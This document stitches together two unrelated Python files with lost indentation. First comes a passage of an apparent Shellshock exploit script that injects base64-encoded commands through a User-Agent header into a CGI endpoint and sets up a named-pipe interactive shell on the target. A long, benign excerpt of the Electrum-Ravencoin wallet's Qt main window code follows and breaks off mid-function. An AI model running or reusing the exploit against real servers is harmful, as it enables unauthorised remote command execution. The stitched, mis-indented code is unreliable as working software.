output = RunCmd(readoutput)
if output:
RunCmd(clearoutput)
print(output)
time.sleep(self.interval)
def RunCmd(cmd):
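    # Deliver one command through the Shellshock vector: the command is
    # base64-encoded so it survives the User-Agent header, then decoded and
    # piped to sh by the injected function body on the target.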
cmd = cmd.encode('utf-8')
cmd = b64encode(cmd).decode('utf-8')
headers = \
{'User-Agent': '() { :; }; echo "Content-Type: text/html"; echo; export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; echo "%s" | base64 -d | sh' \
% cmd}
result = (requests.get('http://192.168.1.31:591/cgi-bin/cat',
headers=headers, timeout=2).text).strip()
return result
def WriteCmd(cmd):
cmd = cmd.encode('utf-8')
cmd = b64encode(cmd).decode('utf-8')
headers = \
{'User-Agent': '() { :; }; echo "Content-Type: text/html"; echo; export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; echo "%s" | base64 -d > %s' \
% (cmd, stdin)}
result = (requests.get('http://192.168.1.31:591/cgi-bin/cat',
headers=headers, timeout=2).text).strip()
return result
def ReadCmd():
GetOutput = """/bin/cat %s""" % (stdout)
output = RunCmd(GetOutput)
return output
def SetupShell():
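    # Build a crude interactive shell on the target: commands written to the
    # stdin FIFO are executed by the tail -f | /bin/sh pipeline, and all shell
    # output is appended to the stdout file that AllTheReads polls.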
NamedPipes = """mkfifo %s;tail -f %s | /bin/sh 2>&1 >%s""" \
% (stdin, stdin, stdout)
try:
RunCmd(NamedPipes)
    except Exception:
        pass
return None
global stdin, stdout
session = randrange(1000, 9999)
stdin = "/dev/shm/input.%s" % (session)
stdout = "/dev/shm/output.%s" % (session)
SetupShell()
# Infinite loop to read STDOUT File
ReadingTheThings = AllTheReads()
while True:
cmd = input("> ")
WriteCmd(cmd + "\n")
time.sleep(1.1)
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont, QRegExpValidator
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal, QPoint
from PyQt5.QtCore import QTimer, QRegExp
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton, )
import electrum
from electrum.gui import messages
from electrum import (keystore, ecc, constants, util, ravencoin, commands,
paymentrequest, lnutil)
from electrum.ravencoin import COIN, is_address, base_decode, TOTAL_COIN_SUPPLY_LIMIT_IN_BTC
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME,
InvoiceError)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput, RavenValue, script_GetOp)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException, LnInvoiceException
from .asset_workspace import AssetCreateWorkspace, AssetReissueWorkspace
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, RVNAmountEdit, FreezableLineEdit, FeerateEdit, PayToAmountEdit, SizedFreezableLineEdit
from .messages_list import UpdateDevMessagesThread
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog, HeaderTracker)
from .util import ButtonsTextEdit, ButtonsLineEdit, ComplexLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
from .rbf_dialog import BumpFeeDialog, DSCancelDialog
from ...assets import is_main_asset_name_good, is_sub_asset_name_good, is_unique_asset_name_good
from .qrreader import scan_qrcode
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25, 25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
# ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
# if wallet.has_lightning():
# self.wallet.config.set_key('show_channels_tab', True)
self.asset_blacklist = self.wallet.config.get('asset_blacklist', [])
self.asset_whitelist = self.wallet.config.get('asset_whitelist', [])
self.use_own_cb = QCheckBox(_('Force use own RVN'))
self.force_use_own = False
# Tracks sendable things
self.send_options = [] # type: List[str]
Exception_Hook.maybe_setup(config=self.config, wallet=self.wallet)
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self._cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
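        # Main tab widget: History, Assets, Send and Receive are always present;
        # the remaining tabs are optional and gated on 'show_<name>_tab' config keys
        # via add_optional_tab() below.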
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.assets_tab = self.create_assets_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.messages_tab = self.create_messages_tab()
# self.channels_tab = self.create_channels_tab()
self.header_tracker = HeaderTracker()
self.history_tab = self.create_history_tab()
history_tab_widget = QWidget()
self.history_tab_layout = QVBoxLayout()
self.history_tab_layout.setAlignment(Qt.AlignCenter)
self.history_tab_layout.addWidget(self.header_tracker)
self.history_tab_layout.addWidget(self.history_tab)
history_tab_widget.setLayout(self.history_tab_layout)
tabs.addTab(history_tab_widget, read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.assets_tab, read_QIcon('tab_assets.png'), _('Assets'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name, default=False):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), default):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.messages_tab, read_QIcon("tab_message.png"), _("Messages"), "messages")
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
# add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QScrollArea()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
self.setMinimumWidth(640)
self.setMinimumHeight(400)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum-ravencoin.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self,
lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1) % wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self,
lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1) % wrtabs.count()))
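        # Note: the `i=i` default argument binds the loop value at definition time,
        # so each Alt+<n> shortcut switches to its own tab.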
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded', 'asset_meta']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
# self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_(
"For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
self._update_check_thread = None
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum-Ravencoin {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
self._dev_notification_thread = None
if config.get('get_dev_notifications', True):
self._dev_notification_thread = UpdateDevMessagesThread(self)
self._dev_notification_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
# return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
# elif event == 'gossip_db_loaded':
# self.channels_list.gossip_db_loaded.emit(*args)
# elif event == 'channels_updated':
# wallet = args[0]
# if wallet == self.wallet:
# self.channels_list.update_rows.emit(*args)
# elif event == 'channel':
# wallet = args[0]
# if wallet == self.wallet:
# self.channels_list.update_single_row.emit(*args)
# self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
elif event == 'asset_meta':
pass
# self.reissue_workspace.refresh_owners(True)
# self.create_workspace.refresh_owners(True)
else:
self.logger.info(f"unexpected network event: {event} {args}")
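    # Resolve the OpenAlias configured under the 'alias' key in a background thread;
    # alias_received_signal is emitted once the lookup completes.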
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
            t.daemon = True
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
        # Once the GUI has been initialized, check whether there is anything to announce,
        # since the relevant callback may already have fired before the GUI existed.
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
# self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
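    # Restore the saved window geometry if it still fits on the current screen;
    # otherwise fall back to a sensible default size.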
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
if not self.isMaximized():
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
if not self.isMaximized():
self.setGeometry(100, 100, 950, 550)
self.setMinimumSize(950, 550)
def watching_only_changed(self):
name = "Electrum Ravencoin Testnet" if constants.net.TESTNET else "Electrum Ravencoin"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]' % ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Ravencoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Ravencoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_hardware(self):
if not self.wallet.keystore or self.wallet.keystore.get_type_text()[:2] != 'hw':
return
if self.config.get('dont_show_hardware_warning', False):
return
msg = ''.join([
_("This is a hardware wallet."), '\n',
_("Mining to this wallet may cause you problems. If mining, ensure you make your mining payouts sporadic"), '\n',
_("or mine to an electrum software wallet and transfer to hardware.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Hardware Wallet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_hardware_warning', True)
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Ravencoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return False
backup_dir = self.config.get_backup_dir()
if backup_dir is None:
self.show_message(_("You need to configure a backup directory in your preferences"),
title=_("Backup not configured"))
return
try:
new_path = self.wallet.save_backup(backup_dir)
except BaseException as reason:
self.show_critical(
_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason),
title=_("Unable to create backup"))
return
msg = _("A copy of your wallet file was created in") + " '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
return True
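    # Maintain the "Recently open" menu: move the current file to the front, drop
    # paths that no longer exist, and keep at most five entries (Ctrl+1..Ctrl+5).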
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d" % (i + 1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
#history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab, default=False):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), default)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.messages_tab, True)
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
# add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
if self.network and self.network.local_watchtower:
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
# Cannot be closed on mac; disabled for now
